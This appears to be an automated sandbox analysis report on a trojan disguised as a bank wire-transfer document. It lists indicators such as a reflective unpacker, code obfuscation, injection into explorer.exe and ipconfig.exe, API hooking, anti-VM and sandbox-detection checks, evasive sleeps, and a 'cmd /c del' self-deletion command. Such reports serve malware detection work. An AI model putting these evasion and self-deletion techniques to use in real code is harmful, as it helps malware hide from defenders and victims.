Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"			Jump to behavior

Creates files inside the user directory

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC ... Wire Transfer Copy.exe.log

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@3/2

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_01
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Sample might require command line arguments

Source: HSBC ... Wire Transfer Copy.exe	String found in binary or memory: /ISectionEnt;component/views/addbook.xaml
Source: HSBC ... Wire Transfer Copy.exe	String found in binary or memory: views/addbook.baml
Source: HSBC ... Wire Transfer Copy.exe	String found in binary or memory: views/addcustomer.baml
Source: HSBC ... Wire Transfer Copy.exe	String found in binary or memory: /ISectionEnt;component/views/addcustomer.xaml
Source: HSBC ... Wire Transfer Copy.exe	String found in binary or memory: /ISectionEnt;component/views/addbook.xaml
Source: HSBC ... Wire Transfer Copy.exe	String found in binary or memory: views/addcustomer.baml
Source: HSBC ... Wire Transfer Copy.exe	String found in binary or memory: views/addbook.baml
Source: HSBC ... Wire Transfer Copy.exe	String found in binary or memory: /ISectionEnt;component/views/addcustomer.xaml
Source: HSBC ... Wire Transfer Copy.exe	String found in binary or memory: S/ISectionEnt;component/views/addbook.xamli/ISectionEnt;component/views/borrowfrombookview.xaml_/ISectionEnt;component/views/borrowingview.xamlY/ISectionEnt;component/views/changebook.xamla/ISectionEnt;component/views/changecustomer.xaml]/ISectionEnt;component/views/customerview.xamla/ISectionEnt;component/views/deletecustomer.xamlW/ISectionEnt;component/views/errorview.xaml[/ISectionEnt;component/views/smallextras.xaml[/ISectionEnt;component/views/addcustomer.xaml
Source: HSBC ... Wire Transfer Copy.exe	String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml

Reads the hosts file

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE file contains a COM descriptor data directory

Source: HSBC ... Wire Transfer Copy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: HSBC ... Wire Transfer Copy.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: ipconfig.pdb source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: HSBC ... Wire Transfer Copy.exe, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.HSBC ... Wire Transfer Copy.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.HSBC ... Wire Transfer Copy.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.9.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.HSBC ... Wire Transfer Copy.exe.c00000.1.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.5.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.1.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.3.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.7.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.2.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 0_2_003E92F5 push ds; ret		0_2_003E9340
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 0_2_003E9361 push ds; retf		0_2_003E9364
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 0_2_003E9347 push ds; ret		0_2_003E934C
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041EA76 push 1501B1CAh; retf		6_2_0041EA7B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_00416C20 push C10A24AAh; iretd		6_2_00416C25
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_004164D3 push eax; retf		6_2_004164D6
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041D4B5 push eax; ret		6_2_0041D508
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041D56C push eax; ret		6_2_0041D572
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041D502 push eax; ret		6_2_0041D508
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0041D50B push eax; ret		6_2_0041D572
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_00C092F5 push ds; ret		6_2_00C09340
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_00C09347 push ds; ret		6_2_00C0934C
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_00C09361 push ds; retf		6_2_00C09364
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0167D0D1 push ecx; ret		6_2_0167D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0369D0D1 push ecx; ret		16_2_0369D0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7EA76 push 1501B1CAh; retf		16_2_02C7EA7B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C764D3 push eax; retf		16_2_02C764D6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7D4B5 push eax; ret		16_2_02C7D508
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C76C20 push C10A24AAh; iretd		16_2_02C76C25
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7EDAE pushad ; ret		16_2_02C7EDAF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7D56C push eax; ret		16_2_02C7D572
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7D502 push eax; ret		16_2_02C7D508
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_02C7D50B push eax; ret		16_2_02C7D572

Binary may include packed or encrypted code

Source: initial sample

Static PE information: section name: .text entropy: 7.86790735928

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEF

Self deletion via cmd delete

Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"			Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 0.2.HSBC ... Wire Transfer Copy.exe.2908f34.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HSBC ... Wire Transfer Copy.exe.299b518.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HSBC ... Wire Transfer Copy.exe PID: 6892, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000002C69904 second address: 0000000002C6990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000002C69B7E second address: 0000000002C69B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7036	Thread sleep count: 985 > 30			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -239841s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7036	Thread sleep count: 1635 > 30			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 6896	Thread sleep time: -36646s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -239686s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -239577s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -239452s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -239342s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -239233s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -239124s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -238999s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -238889s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -238781s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -238670s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -238560s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -238453s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -238343s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -238000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -237203s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -236703s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -236534s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028	Thread sleep time: -236406s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 6936	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 6628	Thread sleep time: -48000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6264	Thread sleep time: -36000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\ipconfig.exe

Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 240000			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239841			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239686			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239577			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239452			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239342			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239233			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239124			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238999			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238889			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238781			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238670			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238560			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238453			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238343			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238000			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 237203			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 236703			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 236534			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 236406			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Window / User API: threadDelayed 985			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Window / User API: threadDelayed 1635			Jump to behavior

Queries a list of all running processes

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Process information queried: ProcessInformation

Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 240000			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239841			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 36646			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239686			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239577			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239452			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239342			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239233			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 239124			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238999			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238889			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238781			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238670			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238560			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238453			Jump to behavior
